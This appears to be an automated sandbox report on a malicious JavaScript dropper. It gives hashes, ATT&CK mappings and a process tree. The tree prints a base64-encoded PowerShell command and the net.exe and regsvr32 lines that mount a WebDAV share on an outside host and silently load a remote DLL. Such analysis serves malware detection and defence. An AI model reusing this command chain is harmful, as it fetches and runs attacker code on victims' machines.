b1595b2d7b5f357393635666a0ea12953b1b4120aacfb10b5d9b31d53935546a

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
26/07/2024, 07:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

16809191722972732343.js
Size

15KB
MD5

002c73bc923436229e3567c5c8e02f5d
SHA1

015114340497e712775695fb3d11b18765f8824c
SHA256

b1595b2d7b5f357393635666a0ea12953b1b4120aacfb10b5d9b31d53935546a
SHA512

a07055831de0ec321bacf94ba454ae45c87a4a06790f2badfc3743f2eba96bf2fb2c0bc6bf63a395c68ad56a51573c43720a2efb2818588727c3ad7abda522b4
SSDEEP

192:O1KvP37KSmYJt4aAivoRwIt4aAivoRVZyPPb1B:HvP3DNvoGUNvoLZyPPb3

Score

6^/10

defense_evasion execution

Malware Config

Signatures

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2812	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2812	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2304 wrote to memory of 2812	2304	wscript.exe	31
PID 2304 wrote to memory of 2812	2304	wscript.exe	31
PID 2304 wrote to memory of 2812	2304	wscript.exe	31
PID 2812 wrote to memory of 2968	2812	powershell.exe	33
PID 2812 wrote to memory of 2968	2812	powershell.exe	33
PID 2812 wrote to memory of 2968	2812	powershell.exe	33
PID 2812 wrote to memory of 2592	2812	powershell.exe	34
PID 2812 wrote to memory of 2592	2812	powershell.exe	34
PID 2812 wrote to memory of 2592	2812	powershell.exe	34
PID 2812 wrote to memory of 2592	2812	powershell.exe	34
PID 2812 wrote to memory of 2592	2812	powershell.exe	34

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\16809191722972732343.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADMAMAA5ADQANgAxADQANAA5ADUAMgA5ADYAOAA2AC4AZABsAGwA
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2812
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\
    3⤵
    PID:2968
- - C:\Windows\system32\regsvr32.exe
    "C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\309461449529686.dll
    3⤵
    PID:2592

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2812-4-0x000007FEF54CE000-0x000007FEF54CF000-memory.dmp

Filesize
4KB

Download
memory/2812-7-0x00000000028E0000-0x00000000028E8000-memory.dmp

Filesize
32KB

Download
memory/2812-6-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2812-5-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/2812-8-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2812-9-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2812-10-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2812-11-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2812-12-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

Filesize
9.6MB

Download